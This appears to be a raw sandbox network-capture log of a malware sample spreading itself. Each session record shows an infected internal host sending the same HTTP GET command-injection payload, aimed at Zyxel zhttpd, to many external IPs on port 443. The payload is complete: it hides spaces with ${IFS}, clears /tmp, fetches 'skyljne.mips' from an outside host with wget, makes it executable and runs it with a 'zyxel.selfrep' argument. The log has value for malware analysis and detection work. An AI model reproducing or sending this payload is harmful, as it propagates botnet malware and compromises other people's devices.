                                                Jan 12, 2024 18:16:29.600318909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5954192.168.2.2339460205.211.197.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600353956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5955192.168.2.2354146155.76.203.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600397110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5956192.168.2.2351828223.41.93.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600447893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5957192.168.2.236050491.63.75.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600482941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5958192.168.2.2352510175.184.226.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600531101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5959192.168.2.2359138103.207.46.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600585938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5960192.168.2.2353610112.18.183.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600636005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5961192.168.2.2343010171.71.193.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600675106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5962192.168.2.235514017.23.90.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600722075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5963192.168.2.23454661.193.47.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600760937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5964192.168.2.2343822109.172.179.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600790024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5965192.168.2.23366181.188.71.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600812912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5966192.168.2.2354124171.149.176.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600872040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5967192.168.2.2332800111.175.110.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600892067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5968192.168.2.234749884.141.149.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600936890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5969192.168.2.233877895.203.117.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600980997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5970192.168.2.2336512184.84.206.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601018906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5971192.168.2.235545020.102.228.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601052046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5972192.168.2.2337442209.37.172.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601109028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5973192.168.2.234100278.231.19.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601155996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5974192.168.2.2333194131.42.23.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601202965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5975192.168.2.2351346179.107.70.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601238966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5976192.168.2.2359936113.33.5.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601269007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5977192.168.2.2333416139.36.92.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601317883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5978192.168.2.2357858156.194.193.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601375103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5979192.168.2.2336608197.62.139.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601416111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5980192.168.2.235520654.113.109.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601453066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5981192.168.2.2351898212.226.151.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601481915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5982192.168.2.236010245.218.53.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601532936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5983192.168.2.234481632.63.241.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601584911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5984192.168.2.233387274.2.235.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601624012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5985192.168.2.2352524198.110.199.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601646900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5986192.168.2.2332898180.84.52.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601689100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5987192.168.2.2352504218.123.156.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601747036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5988192.168.2.2348370216.17.113.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601768970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5989192.168.2.2358940220.149.76.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601829052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5990192.168.2.233449282.122.24.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601880074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5991192.168.2.235431613.236.28.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601901054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5992192.168.2.2343226139.10.217.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601923943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5993192.168.2.2355512220.170.25.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.601973057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5994192.168.2.2337088175.164.37.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602014065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5995192.168.2.2341974103.181.217.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602072954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5996192.168.2.2347536144.12.86.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602101088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5997192.168.2.2346402204.104.109.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602152109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5998192.168.2.2342828204.65.89.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602195978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5999192.168.2.235309097.163.7.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602231026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6000192.168.2.2343988210.120.216.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602267027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6001192.168.2.2351430100.198.158.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602313995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6002192.168.2.2342854117.32.255.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602348089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6003192.168.2.2351866143.92.153.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602400064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6004192.168.2.2354362137.60.64.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602459908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6005192.168.2.2333458197.229.102.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602489948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6006192.168.2.2343162143.41.146.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602521896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6007192.168.2.2339582168.213.160.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602576017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6008192.168.2.234761431.112.65.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602600098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6009192.168.2.2353832217.253.13.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602646112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6010192.168.2.234941863.98.73.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602701902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6011192.168.2.2342096148.172.50.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602741957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6012192.168.2.2352088151.71.60.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602771044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6013192.168.2.2359536191.246.9.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602818012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6014192.168.2.2353366138.242.51.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602864027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6015192.168.2.2350838178.134.118.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602889061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6016192.168.2.235797625.169.156.163443
                                                TimestampBytes transferredDirectionData
